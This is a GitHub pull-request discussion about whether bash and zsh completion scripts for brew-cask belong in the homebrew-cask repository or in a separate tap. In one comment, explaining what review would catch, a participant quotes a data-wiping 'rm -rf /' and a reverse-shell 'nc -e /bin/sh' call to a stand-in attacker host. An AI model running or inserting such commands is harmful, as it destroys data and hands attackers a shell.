### PR TITLE
bash completion for brew-cask

### PR DESCRIPTION
**Pull request by xyb**
For `brew-cask` now, not `brew cask`.

### CODE REVIEW

**Comment by vitorgalvao** [comment]
@caskroom/maintainers Need opinions on this.

Personally, I’m against including it in the main repo, and would be more comfortable if it were some external package/command, for example in [`bash-it`](https://github.com/Bash-it/bash-it), much in the way zsh completions are handled by a plugin on [`oh-my-zsh`](https://github.com/robbyrussell/oh-my-zsh), and not by us.

Basically, I don’t think we should be adding the responsibility of improving and maintaning a script that is outside the core functionality of the app itself, and one that is shell specific, at that.

I could be convinced otherwise, though, so please voice thoughts.

**Comment by alebcay** [comment]
+1 for completions in another repo. We can consider supporting it officially, but it's outside of this scope of this repo in particular.

**Comment by jawshooah** [comment]
I agree with the above. Homebrew actually has a [tap for completions](https://github.com/homebrew/homebrew-completions), which would be a good place for this.

**Comment by Amorymeltzer** [comment]
No problem with any of the above, but to play Devil's advocate is there any reason other than it's kind of awkward?  This (and maybe a zsh version) would pretty much be the limit, is there a reason not to throw it into our `/developer` folder?  It's cheap and would probably be welcome by users.

At any rate, homebrew has a tap for this sort of thing.  We're not homebrew but we do support their mission(!), so why not use 'em for what they're good for?

**Comment by jawshooah** [comment]
Yup, homebrew has builtins for installing completion scripts.

I'd be more in favor of including this if it were for `brew cask` instead of `brew-cask`, as I believe that's the form most people use.

**Comment by xyb** [comment]
Personally I support builtins, because `brew` came with bash completion, we could do it same way. My original plan is support `brew-cask` on `homebrew-cask` at first, than support `brew cask` with patching `homebrew/Contributions/brew_bash_completion.sh` which is the only way to do it.

Put the completion script to another repo works also. But I must mention that patching `homebrew`'s script is still work to be done.

**Comment by vitorgalvao** [comment]
Looks like we have consensus. @xyb Could you submit to the completions repo? After that, perhaps we could add it and the zsh completions to the README.

**Comment by joshka** [comment]
I know that this issue settled on keeping the completions out of this repo. I'd like to repoen that question and offer to take on the responsibility of fixing this up across the board (i.e. for bash, zsh and fish).

Many brew formula install bash and zsh completions into the system automatically. This includes brew by default. I'd like to see brew-cask be consistent with the others.

The comment about this being available as an oh-my-zsh plugin is irrelevant to those using Prezto.

The comment about this only being for `brew-cask` not `brew cask` is relevant though. I've written a change for the zsh completion script that addresses this (https://github.com/Homebrew/brew/pull/407) and a corresponding update to the zsh completions at https://github.com/joshka/brew-cask-zsh-completions. Wouldn't it be nice to have this as just something that happens when you tap homebrew-cask? This was the change that @xyb was talking about above for the bash completions.

Additionally, moving the completions scripts into this repo simplifies things and reduces the security exposure (i.e. the reliance on non-homebrew/cask reviewed code to run on my system).

TL;DR - Is this decision set in stone, or open to a change? If it's open to change, I'll go ahead and submit a followup PR with the changes to bring it into alignment.

**Comment by jawshooah** [comment]
> Additionally, moving the completions scripts into this repo simplifies things and reduces the security exposure (i.e. the reliance on non-homebrew/cask reviewed code to run on my system).

The problem with this is that, as far as I know, none of us know how to maintain completion scripts. Having them in the repo doesn't confer any additional security if we aren't able to review them for security holes, or even for correctness.

**Comment by joshka** [comment]
I'm more concerned with something that would be obvious, like hitting tab on brew cask runs `rm -rf /` or `nc -e /bin/sh evilattacker.com 80`

**Comment by joshka** [comment]
Regarding how easy these are to maintain, I'd suggest it might be useful to take a quick look at https://github.com/joshka/brew-cask-zsh-completions/blob/master/_brew_cask

For most simple changes to the commands and arguments in homebrew cask, the changes should be relatively simple and be able to be done by someone unfamiliar with these. The code is intentionally modular and intent revealing. I'm happy to be tagged whenever there's a command change as well.

The Cask Bash completions seem a little more complex, but I can think of a few ways to simplify them so they're just as easy to maintain.
